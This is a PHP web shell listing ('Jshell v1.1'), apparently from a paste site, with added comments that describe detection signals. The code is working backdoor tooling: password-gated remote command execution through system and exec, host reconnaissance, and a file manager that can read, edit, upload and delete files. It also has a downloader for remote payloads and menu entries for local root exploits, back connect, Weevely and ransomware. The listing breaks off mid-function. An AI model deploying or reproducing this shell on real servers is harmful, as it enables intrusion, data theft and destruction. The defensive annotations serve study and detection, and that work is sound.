

a guest
Jun 9th, 2018
  1. <?php
  2. /**
  3. * [ Jshell v1.1 - 2018. ]
  4. *
  5. * @author shutdown57 ( alinko ) < >
  6. * @version 1.0 2018
  7. * @link page :
  8. * @link group :
  9. * @see ( justalinko )
  10. * @see ( shutdown57 )
  11. * @copyright &copy; 2018 JavCode.
  12. *
  13. **/
  // Page settings handed to Jheader(): title, favicon and the external jQuery / DataTables / CSS URLs.
  // NOTE(review): every URL value is an empty string in this copy of the listing.
  14. $config = [
  15. 'title' => 'Jshell v1.1', // page title, printed in <title> and in the header banner
  16. 'debug' => true, // when true, errors are meant to be displayed
  17. 'icon' => '',
  18. 'src_jquery' => '',
  19. 'src_datatables' => '',
  20. 'src_style' => '',
  21. ];
  23. Class Jshell{
  24. public $menubar;
  25. public $src_link;
  26. public $password;
  /**
   * Sets the access password, turns off PHP error logging and display, gates the
   * page behind a session flag, then resolves the working directory from the
   * `jshell_path` query parameter and fills the menu and download-link tables.
   *
   * Defender notes (all visible in this block):
   *  - The password is hard-coded and compared with `==`; a correct POST of
   *    `passw` sets $_SESSION['jshell'] and redirects to `?login=<password>`,
   *    so the password itself ends up in the web server's access log.
   *  - error_log, log_errors and display_errors are switched off at runtime, so
   *    the PHP error log is not a dependable source of traces for this script.
   *  - `jshell_path` is passed to chdir() and echoed into links unvalidated.
   *  - Request parameters to look for: `jshell_path`, `jshell_act` (values upl,
   *    cmd, lc, net, php, wev, rans) and the POST field `passw`.
   *  - All src_link URLs are empty strings in this copy of the listing.
   */
  27. public function __construct()
  28. {
  29. /** The script started here. **/
  30. $this->password = 'w'; // password
  32. if($config['debug'] === true)
  33. { error_reporting(-1); }else{ error_reporting(0); }
  34. error_log(0);
  35. session_start();
  36. ob_start();
  37. set_time_limit(0);
  // Runtime overrides: no error log file, no error logging, no time limit, no error display.
  38. @ini_set('error_log',NULL);
  39. @ini_set('log_errors',0);
  40. @ini_set('max_execution_time',0);
  41. @ini_set('output_buffering',0);
  42. @ini_set('display_errors', 0);
  44. // login authentication: without the session flag only the password form is served
  45. if(empty($_SESSION['jshell']))
  46. {
  47. echo "<center><h3>Jshellv1 - 2018</h3><form method=post><input type=password name=passw placeholder=password><input type=submit value=Go></form></center>";
  48. if(isset($_POST['passw']))
  49. {
  50. if($_POST['passw'] == $this->password)
  51. {
  52. $_SESSION['jshell'] = true;
  // The redirect target carries the password as the `login` query value.
  53. echo "<meta http-equiv=refresh content=0;url=?login=".$this->password.">";
  54. }
  55. }
  56. exit;
  57. }
  // Working directory: taken from the query string when present, otherwise the script's cwd.
  59. $GLOBALS['getfullpath'] = (empty($_GET['jshell_path'])) ? getcwd() : $_GET['jshell_path'];
  60. @chdir($GLOBALS['getfullpath']);
  61. $baselink = "?jshell_path=".$GLOBALS['getfullpath']."&jshell_act=";
  // Menu label => link; the suffix after jshell_act= is the action code the dispatcher tests.
  62. $this->menubar = [
  63. 'Home' => $_SERVER['PHP_SELF'],
  64. 'Upload' => $baselink.'upl',
  65. 'Command' => $baselink.'cmd',
  66. 'Localroot' => $baselink.'lc',
  67. 'Back Connect' => $baselink.'net',
  68. 'PHP' => $baselink.'php',
  69. 'Weevely' => $baselink.'wev',
  70. 'Ransomware' => $baselink.'rans',];
  // Remote payload URLs used by Jcaller(); blank in this copy.
  72. $this->src_link = [
  73. 'adminer' => '',
  74. 'weevely' => '',
  75. 'mailer' => '',
  76. 'lc' => [
  77. 'dirty' => '',
  78. 'c0w' => '',
  79. 'cowroot' => '',
  80. ],
  81. 'ransomware' => '',
  82. ];
  85. }
  /**
   * Runs $cmd through the first of system(), exec(), passthru() or shell_exec()
   * that function_exists() reports, and returns the captured output as a string.
   * Nothing is returned when none of the four is available. The exec() branch
   * joins the output lines without any separator.
   *
   * Defender notes: $cmd is used as given, with no escaping or allow-list; in this
   * listing it is either a fixed probe string or the POST field `cmd`.
   * function_exists() is false for names listed in php.ini disable_functions, so
   * disabling all four leaves this method without a working branch. Child
   * processes started by the web server / PHP-FPM account are the host-level
   * signal of its use.
   *
   * @param string $cmd command line handed to the operating system
   * @return string|null captured output
   */
  86. public function Jcmd($cmd) {
  87. if(function_exists('system')) {
  // system() prints directly, so output buffering is used to capture it.
  88. @ob_start();
  89. @system($cmd);
  90. $exect = @ob_get_contents();
  91. @ob_end_clean();
  92. return $exect;
  93. } elseif(function_exists('exec')) {
  94. @exec($cmd,$results);
  95. $exect = "";
  96. foreach($results as $result) {
  97. $exect .= $result;
  98. } return $exect;
  99. } elseif(function_exists('passthru')) {
  100. @ob_start();
  101. @passthru($cmd);
  102. $exect = @ob_get_contents();
  103. @ob_end_clean();
  104. return $exect;
  105. } elseif(function_exists('shell_exec')) {
  106. $exect = @shell_exec($cmd);
  107. return $exect;
  108. }
  109. }
  /**
   * Reports the account the script is running under.
   *
   * With the POSIX extension present, the effective uid/gid are resolved to
   * names through posix_getpwuid() / posix_getgrgid(). Without it, the values
   * come from get_current_user(), getmyuid() and getmygid(), and the group name
   * is the placeholder "?".
   *
   * @return array keys: user, uid, group, gid
   */
  110. public function Jgetgrowif()
  111. {
  112. if(!function_exists('posix_getegid')) {
  113. $user = @get_current_user();
  114. $uid = @getmyuid();
  115. $gid = @getmygid();
  116. $group = "?";
  117. } else {
  // $uid / $gid first hold the passwd / group records, then are narrowed to the numeric ids.
  118. $uid = @posix_getpwuid(posix_geteuid());
  119. $gid = @posix_getgrgid(posix_getegid());
  120. $user = $uid['name'];$uid = $uid['uid'];
  121. $group = $gid['name'];$gid = $gid['gid'];
  122. }
  123. $r = ['user' => $user,'uid' => $uid,'group' => $group,'gid' => $gid];
  124. return $r;
  125. }
  /**
   * Collects host reconnaissance data for the header banner.
   *
   * The mysql, mysqli and curl entries test for PHP functions. The wget, perl,
   * python, bash and gcc entries are filled by running the tool through Jcmd()
   * (`<tool> --help`, or `bash --version`), so every call to this method starts
   * five processes. The yes/no entries are returned as HTML <font> snippets, not
   * booleans; `disafunc` is the disable_functions ini value wrapped at 100
   * characters.
   *
   * Defender notes: `hostname` and `ipserver` are derived from the
   * client-supplied Host header. A burst of `wget --help`, `perl --help`,
   * `python --help`, `bash --version` and `gcc --help` under the web server
   * account is a recognisable process pattern for this method.
   *
   * @return array keys: hostname, system, phpv, software, ipserver, ipclient,
   *               mysql, mysqli, wget, curl, perl, python, bash, gcc, safemode, disafunc
   */
  126. public function Jserverinfo()
  127. {
  128. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  129. $mysqli = (function_exists('mysqli_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  // Tool probes: any non-empty output from the command counts as "YES".
  130. $wget = ($this->Jcmd('wget --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  131. $curl = (function_exists('curl_init')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  132. $perl = ($this->Jcmd('perl --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  133. $python = ($this->Jcmd('python --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  134. $bash = ($this->Jcmd('bash --version')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  135. $gcc = ($this->Jcmd('gcc --help')) ? "<font color=lime>YES</font>" :"<font color=red>NO</font>";
  136. $sm = (ini_get('safe_mode') == 'on') ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  137. $df = (ini_get('disable_functions')) ? wordwrap(ini_get('disable_functions'),100,"\n",true) : "<font color=red>NO !</font>";
  138. $sysfo = [
  139. 'hostname' => $_SERVER['HTTP_HOST'],
  140. 'system' => php_uname(),
  141. 'phpv' => phpversion(),
  142. 'software' => $_SERVER['SERVER_SOFTWARE'],
  143. 'ipserver' => gethostbyname($_SERVER['HTTP_HOST']),
  144. 'ipclient' => $_SERVER['REMOTE_ADDR'],
  145. 'mysql' => $mysql,
  146. 'mysqli' => $mysqli,
  147. 'wget' => $wget,
  148. 'curl' => $curl,
  149. 'perl' => $perl,
  150. 'python' => $python,
  151. 'bash' => $bash,
  152. 'gcc' => $gcc,
  153. 'safemode' => $sm,
  154. 'disafunc' => $df];
  155. return $sysfo;
  156. }
  /**
   * Echoes $path as a clickable breadcrumb: backslashes are normalised to "/",
   * and each segment becomes a `javascript:menuklik('?<goto>=<prefix>')` link
   * whose prefix is the path up to and including that segment. A trailing marker
   * shows whether $path is writable (W), readable (R) or neither (Unknown, with
   * a 4-second refresh back to "?").
   *
   * Nothing is returned; output is written directly. Path segments are echoed
   * into the HTML and the JavaScript URL without escaping.
   *
   * @param string $path directory to render
   * @param string $goto query parameter name used in the generated links
   */
  157. public function Jcurdir($path,$goto){
  158. $dir = str_replace("\\","/",$path);
  159. $dir = explode("/",$dir);
  160. foreach($dir as $o=>$i){
  // A leading empty segment means an absolute path: emit the root link.
  161. if($i == "" && $o == 0){
  162. echo "<a href=\"javascript:menuklik('?".$goto."=/')\">/</a>";continue;}
  163. if($i == "")continue;
  164. echo "<a href=\"javascript:menuklik('?".$goto."=";
  165. for($p=0;$p<=$o;$p++){
  166. echo $dir[$p]; if($p != $o){
  167. echo "/";} } echo "')\">".$i."</a>/";}
  168. if(is_writable($path)){echo "- [<b><font color=lime>W</font></b>]";}elseif(is_readable($path)){echo "- [<b><font color=red>R</font></b>]";}else{echo "- [<b><font color=grey>Unknown</font></b>]<meta http-equiv='refresh' content='4;url=?'>";}}
  /**
   * Downloads $url and writes the response body to the local file $name,
   * returning fwrite()'s result (bytes written, or false).
   *
   * $name is opened with mode "w" before the download happens, so the file is
   * created or truncated even when the fetch fails. The fclose() call sits after
   * the return statement and is never reached.
   *
   * Defender notes: fetching an http(s) URL with file_get_contents() depends on
   * the allow_url_fopen ini setting; with it off the remote fetch fails. New
   * .php files appearing next to the script, including zero-byte ones, are the
   * file-system artifact of this method.
   *
   * @param string $url  remote source
   * @param string $name local destination file name
   */
  169. public function Jcaller($url,$name)
  170. {
  171. $fp = fopen($name,"w");
  172. $co = file_get_contents($url);
  173. return fwrite($fp,$co);
  174. fclose($fp);
  175. }
  /**
   * Emits the HTML head, the inline JavaScript helpers and the header banner.
   *
   * The banner prints the values returned by Jserverinfo() and Jgetgrowif(),
   * calling each of them once per field, followed by the current-directory
   * breadcrumb, a "go to dir" box and the menu built in the constructor.
   * The JavaScript helpers (menuklik, gotodir, rename, logout) drive navigation
   * by requesting `?jshell_path=...&jshell_act=...` URLs and replacing the page
   * body with the response.
   *
   * Defender notes: the Host header, $GLOBALS['getfullpath'] and the $config
   * values are written into the page without HTML escaping. The query-string
   * shapes built here (`jshell_path`, `jshell_file`, `jshell_act`, `n`) are the
   * request patterns to search for in access logs.
   *
   * @param array $config expects the keys title, icon, src_jquery, src_datatables, src_style
   */
  176. public function Jheader($config = array())
  177. {
  178. ?>
  179. <!DOCTYPE html>
  180. <html>
  181. <head>
  182. <title><?=$config['title'];?> [<?=$_SERVER['HTTP_HOST'];?>]</title>
  183. <meta charset="utf-8">
  184. <meta name="author" content="shutdown57">
  185. <link rel="icon" type="text/css" href="<?=$config['icon'];?>">
  186. <script type="text/javascript" src="<?=$config['src_jquery'];?>"></script>
  187. <script type="text/javascript" src="<?=$config['src_datatables'];?>"></script>
  188. <!-- <link rel="stylesheet" type="text/css" href="valid/assets/css/w3.css"> -->
  189. <link rel="stylesheet" type="text/css" href="<?=$config['src_style'];?>">
  190. <script type="text/javascript">
  191. function select_all(pilih)
  192. {
  193. var cek = document.getElementsByName('pilih[]');
  194. for (var i =0; n=cek.length;i++) {
  195. cek[i].checked = pilih.checked;
  196. }
  197. }
  198. function logout()
  199. {
  200. $.ajax({
  201. url:'?jshell_act=logout',
  202. success:function(e)
  203. {
  204. alert('Bye Boyz!');
  205. window.location.href='';
  206. }
  207. });
  208. }
  209. function menuklik(uri)
  210. {
  211. $('.right').html("<img src='' style='width:50px;height:50px;'>");
  212. history.pushState(null,null,uri);
  213. $.ajax({
  214. url:uri,
  215. success:function(e)
  216. {
  217. $('body').html(e);
  218. },error:function(e)
  219. {
  220. alert('Something wrong :D '+e);
  221. }
  222. });
  223. }
  224. function rename(dir,file)
  225. {
  226. var newname = prompt('New name');
  227. if(newname != null){
  228. window.location.href='?jshell_path='+dir+'&jshell_file='+file+'&n='+newname+'&jshell_act=ren';
  229. }else{
  230. alert('Nama file masih kosong');
  231. }
  232. }
  233. function hs(l,p)
  234. {
  235. document.getElementById(l).style.display='none';
  236. document.getElementById(p).style.display='block';
  237. }
  238. function gotodir(dir)
  239. {
  240. var dire = $(dir).val();
  241. $.ajax({
  242. url:'?jshell_path='+dire,
  243. success:function(e)
  244. {
  245. $('body').html(e);
  246. history.pushState(null,null,'?jshell_path='+dire);
  247. },error:function(e)
  248. {
  249. alert('error '+e);
  250. }
  251. });
  252. }
  253. $(document).ready(function()
  254. {
  255. $('body').hide().fadeIn(500);
  256. $('#filemanager').DataTable({
  257. 'bSort':false,
  258. });
  259. });
  260. </script>
  261. </head>
  262. <body onload="faded(this)">
  263. <div class="w3-container">
  265. <header>
  266. <div class="right"></div>
  267. <table class="table" style="width: 98%;margin: 0 auto;border-left: 1px dashed #eee;border-right: 1px dashed #f00;border-top: 1px dashed #f00;border-bottom: 1px dashed #eee;">
  268. <tr><td style="width: 200px;" class="kiri"><center><img src="" style="max-width: 170px;max-height:170px;" ><p><?=$config['title'];?> | by : JavCode.</p></center></td><td>
  269. <pre>
  270. System : <?=$this->Jserverinfo()['system'];?> [Exploit-DB] [Search Localroot]
  271. Hostname : <?=$this->Jserverinfo()['hostname'];?> | Safe Mode : <?=$this->Jserverinfo()['safemode'];?> .
  272. Server Software : <?=$this->Jserverinfo()['software'];?>.
  273. PHP Version : <?=$this->Jserverinfo()['phpv'];?> - [<a href="javascript:menuklik('?jshell_path=<?=$GLOBALS[getfullpath]?>&jshell_act=phpinfo');">phpinfo</a>] [<a href="javascript:menuklik('?jshell_path=<?=dirname(php_ini_loaded_file());?>&jshell_file=<?=basename(php_ini_loaded_file());?>&jshell_act=view');">php.ini</a>]
  274. IP Server : <?=$this->Jserverinfo()['ipserver'];?> | IP Client : <?=$this->Jserverinfo()['ipclient'];?>.
  275. HDD : 31.89 / 180.16 GB | [ Free : 148.27 GB ]
  276. User : <?=$this->Jgetgrowif()['user'];?> [<?=$this->Jgetgrowif()['uid'];?>] || Group : <?=$this->Jgetgrowif()['group'];?> [<?=$this->Jgetgrowif()['gid'];?>]
  277. MySQL : <?=$this->Jserverinfo()['mysql'];?> | MySQLi : <?=$this->Jserverinfo()['mysqli'];?> | Wget : <?=$this->Jserverinfo()['wget'];?> | CURL : <?=$this->Jserverinfo()['curl'];?> | Perl : <?=$this->Jserverinfo()['perl'];?> | Python : <?=$this->Jserverinfo()['python'];?> | Bash : <?=$this->Jserverinfo()['bash'];?> | GCC ( compiler ) : <?=$this->Jserverinfo()['gcc'];?>.
  278. Disable functions : <?=$this->Jserverinfo()['disafunc'];?>
  279. </pre>
  280. </td>
  281. </tr>
  282. </table>
  283. <div style="margin-left:10px;margin: 4px;">
  284. <div id="cd">
  285. <a href="javascript:hs('cd','dc');">Current dir</a> :: <?= $this->Jcurdir($GLOBALS['getfullpath'],'jshell_path');?>
  286. </div>
  287. <div id="dc" style="display: none;">
  288. <label>Go to dir :: </label>
  289. <input type="text" id="gtd" value="<?=$GLOBALS['getfullpath'];?>" class="input_m"><input type="button" value=">>" onclick="gotodir('#gtd')" class="submit_m">
  290. </div>
  291. </div>
  292. <ul align=center>
  293. <?php
  294. foreach($this->menubar as $menu=>$link){
  295. echo '<li>[<a href="#" onclick="menuklik(\''.$link.'\');" >'.$menu.'</a>]</li>';
  296. }
  297. ?>
  298. [<a href="#" onclick="logout()"><font color=red>Logout</font></a>]
  299. </ul>
  300. </header><br/><br/>
  301. <h1></h1>
  302. <?php
  303. }
  /**
   * Thin wrapper around scandir(): returns the entry names of $dir (including
   * "." and ".."). When scandir() is not available $s is never assigned, so the
   * method returns an undefined variable.
   *
   * @param string $dir directory to list
   */
  304. public function Jsdir($dir)
  305. {
  306. // Check if scandir() exist in server.
  307. if(function_exists('scandir'))
  308. {
  309. $s = scandir($dir);
  310. }
  311. return $s;
  312. }
  /**
   * Returns the size of $files as a display string: kilobytes rounded to three
   * decimals with a "KB" suffix, or, above 1024 KB, megabytes rounded to two
   * decimals with an "MB" suffix.
   *
   * @param string $files path passed to filesize()
   * @return string
   */
  313. public function Jgetfsize($files) // function for get file size.
  314. {
  315. $size = filesize($files)/1024;
  316. $size = round($size,3);
  317. if($size > 1024){
  318. $size = round($size/1024,2). 'MB';
  319. } else {
  320. $size = $size. 'KB';}
  321. return $size;
  322. }
  /**
   * Returns a type label for $files.
   *
   * With mime_content_type() available: the detected MIME type for readable
   * paths, "Unknown" otherwise. Without it: "Files", "Directory" or "Unknown"
   * from is_file() / is_dir().
   *
   * @param string $files path to classify
   * @return string
   */
  323. public function Jgetmime($files) // function for get mime content type
  324. {
  325. if(function_exists('mime_content_type'))
  326. {
  327. if(is_readable($files)){
  328. $mime =mime_content_type($files);
  329. }else{
  330. $mime = "Unknown";
  331. }
  332. }else{
  333. if(is_file($files))
  334. {
  335. $mime = "Files";
  336. }elseif (is_dir($files)) {
  337. $mime = "Directory";
  338. }else{
  339. $mime = "Unknown";
  340. }
  341. }
  342. return $mime;
  343. }
  /**
   * Returns the contents of file $f as syntax-highlighted HTML inside a
   * <div class="code">: the text is hard-wrapped at 150 characters, run through
   * highlight_string(), and the five default highlight colours are swapped for
   * the shell's own palette.
   *
   * Defender note: this is the file-read primitive behind the `view` action; the
   * path comes from the request and any file readable by the PHP process can be
   * displayed.
   *
   * @param string $f path of the file to display
   * @return string HTML
   */
  344. public function Jvf($f){
  345. $file = wordwrap(file_get_contents($f),150,"\n",true);
  346. $a= highlight_string($file,true);
  347. $old = array("0000BB","000000","FF8000","DD0000", "007700");
  348. $new = array("F73D80","e1e1e1", "05f6fa", "F9FF00" , "1dff1b");
  349. $a= str_ireplace($old,$new, $a);
  350. $result = "<div class=\"code\">";$result .= $a;$result.="</div>";
  351. return $result;}
  /**
   * Deletes $dir, which may be a file or a directory.
   *
   * A directory is first tried with rmdir(); if that fails its entries are
   * scanned, files are unlinked and sub-directories are rmdir()'d one level
   * deep only, so deeper trees are left in place.
   *
   * NOTE(review): $rm is not assigned on every path (for example when the first
   * rmdir() succeeds), so the return value is not a dependable success flag.
   *
   * @param string $dir path to remove
   */
  352. public function Jdel($dir){
  353. if(is_dir($dir)){
  354. if(!rmdir($dir)){
  355. $s=scandir($dir);
  356. foreach ($s as $ss) {
  357. if(is_file($dir."/".$ss)){
  358. if(unlink($dir."/".$ss)){
  359. $rm=rmdir($dir);
  360. }
  361. }
  362. if(is_dir($dir."/".$ss)){
  363. $rm=rmdir($dir."/".$ss);
  364. $rm.=rmdir($dir);
  365. }
  366. }
  367. }elseif(is_file($dir)){
  368. $rm = unlink($dir);
  369. }
  370. }elseif(is_file($dir))
  371. {
  372. $rm = unlink($dir);
  373. }
  374. return $rm;
  375. }
  /**
   * Places an uploaded temp file $a at destination $b using move_uploaded_file(),
   * or copy() when that function is unavailable, and returns the call's result.
   *
   * Defender note: nothing here restricts the destination directory, the file
   * name or its extension; the dispatcher builds $b from the POST field `jdirz`
   * and the client-supplied file name.
   *
   * @param string $a temporary upload path
   * @param string $b destination path
   */
  376. public function Jupl($a,$b){
  377. if(function_exists('move_uploaded_file')){
  378. $upl = move_uploaded_file($a,$b);
  379. }elseif (function_exists('copy')) {
  380. $upl = copy($a,$b);
  381. }
  382. return $upl;
  383. }
  /**
   * Transposes a multi-file upload entry into one array per file.
   *
   * Input is indexed as $file[<key>][<i>]; output is $file_ary[<i>][<key>]. The
   * number of files is taken from count($file['name']).
   *
   * @param array $file one multi-file entry of $_FILES
   * @return array list of per-file arrays
   */
  384. public function array_upload($file){
  385. $file_ary = array();
  386. $file_count = count($file['name']);
  387. $file_key = array_keys($file);
  388. for($i=0;$i<$file_count;$i++) {
  389. foreach($file_key as $val) {
  390. $file_ary[$i][$val] = $file[$val][$i];
  391. }
  392. }
  393. return $file_ary;
  394. }
  /**
   * Returns the modification time of $files formatted as "d-m-Y H:i:s".
   * Errors from date() are suppressed with @.
   *
   * @param string $files path passed to filemtime()
   * @return string
   */
  395. public function Jgetdmod($files) // function for get date modified.
  396. {
  397. $a_fdm=@date("d-m-Y H:i:s", filemtime($files));
  398. return $a_fdm;
  399. }
  /**
   * Returns the owner of $path: the account name when posix_getpwuid() is
   * available, otherwise the numeric uid from fileowner().
   *
   * @param string $path file or directory
   */
  400. public function Jgetowner($path){
  401. if(function_exists('posix_getpwuid')) {
  402. $downer = @posix_getpwuid(fileowner($path));
  403. $downer = $downer['name'];
  404. } else {
  405. $downer = fileowner($path);
  406. }
  407. return $downer;
  408. }
  /**
   * Returns the group of $path: the group name when posix_getgrgid() is
   * available, otherwise the numeric gid from filegroup().
   *
   * @param string $path file or directory
   */
  409. public function Jgetgroup($path){
  410. if(function_exists('posix_getgrgid')) {
  411. $dgrp = @posix_getgrgid(filegroup($path));
  412. $dgrp = $dgrp['name'];
  413. } else {
  414. $dgrp = filegroup($path);
  415. }
  416. return $dgrp;}
  /**
   * Overwrites file $fname with $content (fopen mode 'w'). No value is returned
   * and the results of fopen() and fwrite() are not checked.
   *
   * Defender note: this is the file-write primitive behind the `edit` action;
   * both the path and the content come from the request. Unexpected changes to
   * existing files under the web root are what file-integrity monitoring would
   * surface.
   *
   * @param string $fname   destination path
   * @param string $content bytes to write
   */
  417. public function Jwrite($fname,$content)
  418. {
  419. $fp = fopen($fname,'w');
  420. fwrite($fp,$content);
  421. fclose($fp);
  422. }
  /**
   * Returns the ls-style permission string for $file: one type character
   * (s socket, l link, - regular, b block, d directory, c character, p pipe,
   * u unknown) followed by the owner, group and other rwx triplets. The setuid
   * and setgid bits show as s/S and the sticky bit as t/T in the execute slots.
   *
   * @param string $file path passed to fileperms()
   * @return string ten-character permission string
   */
  423. public function Jgetperms($file){
  424. $perms = fileperms($file);
  425. if (($perms & 0xC000) == 0xC000) {
  426. $info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info;}
  /**
   * Builds the " | "-separated action links for one file-manager row and
   * returns them as an HTML string: delete / edit / download / rename for a
   * file, delete / rename for a directory. The link title is derived from the
   * action code that follows `jshell_act=` in each URL.
   *
   * Defender note: $dir and $file are concatenated into href, onclick and title
   * attributes without escaping, so file names on disk flow straight into the
   * generated markup and script calls.
   *
   * @param string $dir  directory containing the entry
   * @param string $file entry name
   * @return string HTML fragment
   */
  428. public function Jgetact($dir,$file)
  429. {
  430. $act_files = [
  431. 'delete' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=del',
  432. 'edit' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=edit',
  433. 'download' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=dl',
  434. ];
  435. $act_dirs = [
  436. 'delete' => '?jshell_path='.$dir.'&jshell_act=del',
  437. ];
  438. $a ='| ';
  439. if(is_file($dir.'/'.$file))
  440. {
  441. foreach($act_files as $val=>$link)
  442. {
  // Recover the action code from the link to pick the tooltip text.
  443. $getap = explode("jshell_act=",$link);
  444. $getap= $getap[1];
  445. $title = str_replace(['ren','del','edit','dl'],['rename file : '.$file,'delete file : '.$file,'edit file : '.$file,'download file : '.$file],$getap);
  446. $a.= '<a href="#" onclick="menuklik(\''.$link.'\')" title="'.$title.'">'.$val.'</a> | ';
  447. }
  448. $a.= '<a href="#" onclick="rename(\''.$dir.'\',\''.$file.'\')" title="rename file : '.$file.'">rename</a> | ';
  449. }elseif(is_dir($dir.'/'.$file))
  450. {
  451. foreach($act_dirs as $val=>$link)
  452. {$getap = explode("jshell_act=",$link);
  453. $getap= $getap[1];
  454. $title = str_replace(['ren','del','edit','dl'],['rename file : '.$file,'delete file : '.$file,'edit file : '.$file,'download file : '.$file],$getap);
  455. $a.= '<a href="#" onclick="menuklik(\''.$link.'\')" title="'.$title.'">'.$val.'</a> | ';
  456. }
  457. $a.= '<a href="#" onclick="rename(\''.$dir.'\',\''.$file.'\')" title="rename dir : '.$file.'">rename</a> | ';
  458. }
  459. return $a;
  460. }
  /**
   * Echoes a centred section heading of the form "..:: <text> ::..".
   * $text is written into the HTML as given.
   *
   * @param string $text heading text
   */
  461. public function Jtitle($text)
  462. {
  463. echo "<center><h3 class=\"titleac\">..:: ".$text." ::..</h3></center><br/>";
  464. }
  /**
   * Renders the file manager for $path and handles its bulk-action form.
   *
   * The table lists sub-directories first, then files; each row carries a
   * `pilih[]` checkbox whose value is the full path, plus size, type, mtime,
   * owner:group, permissions and the links from Jgetact(). Below the table a
   * select named `actionx` offers Delete and either Copy or Paste, depending on
   * whether $_SESSION['cfile'] is set.
   *
   * When the form is posted (`sac`): delete calls Jdel() on every posted path,
   * copy stores the posted paths in $_SESSION['cfile'], and paste copy()s each
   * stored path into the current directory and clears the session entry.
   *
   * Defender notes: the paths acted on are taken from the POST body as-is, so
   * they are not limited to the directory being displayed. Entry names are
   * echoed into attributes and script calls without escaping.
   *
   * @param string $path directory to list
   */
  465. public function Jfileman($path)
  466. {
  467. ?>
  468. <form method="post">
  469. <table class="a_exp" id="filemanager" style="margin-top: 0px">
  470. <thead>
  471. <tr><th><input type="checkbox" name="pilih[]" onclick="select_all(this)"></th>
  472. <th>Files</th>
  473. <th>Size</th>
  474. <th>Type</th>
  475. <th>Date Modif</th>
  476. <th>Owner:Group</th>
  477. <th>Permission</th>
  478. <th>Action</th>
  479. </tr>
  480. </thead>
  481. <tbody>
  482. <tr><td></td><td><a href="#" onclick="menuklik('?jshell_path=<?=dirname($GLOBALS['getfullpath']);?>')"><< Parent directory</a></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
  483. <?php
  484. /* Scan directory in server */
  485. $sdirs = $this->Jsdir($path);
  486. foreach($sdirs as $sd)
  487. {if(is_file($path.'/'.$sd)||$sd == '.'||$sd == '..')continue;
  488. ?><tr>
  489. <td><input type="checkbox" name="pilih[]" value="<?=$path.'/'.$sd;?>"></td>
  490. <td><a href="#" onclick="menuklik('?jshell_path=<?=$path.'/'.$sd;?>')"><?=$sd;?></a></td>
  491. <td><?=$this->Jgetfsize($path.'/'.$sd);?></td>
  492. <td><?=$this->Jgetmime($path.'/'.$sd);?></td>
  493. <td><?=$this->Jgetdmod($path.'/'.$sd);?></td>
  494. <td><?=$this->Jgetowner($path.'/'.$sd);?>:<?=$this->Jgetgroup($path.'/'.$sd);?></td>
  495. <td><?=$this->Jgetperms($path.'/'.$sd);?></td>
  496. <td><?=$this->Jgetact($path,$sd);?></td>
  498. </tr>
  499. <?php
  500. }
  501. /* scan files in server */
  502. $sfile = $this->Jsdir($path);
  503. foreach($sfile as $sf)
  504. {if(is_dir($path.'/'.$sf)||$sf == '.'||$sf == '..')continue;
  505. ?><tr>
  506. <td><input type="checkbox" name="pilih[]" value="<?=$path.'/'.$sf;?>"></td>
  507. <td><a href="#" onclick="menuklik('?jshell_path=<?=$path;?>&jshell_file=<?=$sf;?>&jshell_act=view')"><?=$sf;?></a></td>
  508. <td><?=$this->Jgetfsize($path.'/'.$sf);?></td>
  509. <td><?=$this->Jgetmime($path.'/'.$sf);?></td>
  510. <td><?=$this->Jgetdmod($path.'/'.$sf);?></td>
  511. <td><?=$this->Jgetowner($path.'/'.$sf);?>:<?=$this->Jgetgroup($path.'/'.$sf);?></td>
  512. <td><?=$this->Jgetperms($path.'/'.$sf);?></td>
  513. <td><?=$this->Jgetact($path,$sf);?></td>
  515. </tr>
  516. <?php
  517. }
  518. ?>
  519. </tbody>
  520. </table><div style="clear: both; margin-bottom:69px"></div><table style="bottom: 0;left: 0;position: fixed;"><tr><td>
  521. Actions</td><td><select name="actionx" class="input_m">
  522. <option>----[ action ]----</option>
  523. <option value="delete">Delete</option>
  524. <?php
  525. if(empty($_SESSION['cfile'])){
  526. ?>
  527. <option value="copy">Copy</option>
  528. <?php
  529. }else{
  530. ?><option value="paste">Paste</option><?php
  531. }
  532. ?>
  533. </select><input type="submit" name="sac" value=">>" class="submit_m">
  534. </td></tr></table>
  535. </form>
  536. <?php
  // Bulk-action handler: runs after the table has been printed, then refreshes the listing.
  537. if(isset($_POST['sac']))
  538. {
  539. if($_POST['actionx'] == 'delete')
  540. {
  541. foreach($_POST['pilih'] as $dfil)
  542. {
  543. if($this->Jdel($dfil))
  544. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  545. else
  546. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  547. }
  548. }elseif($_POST['actionx'] == 'copy')
  549. {
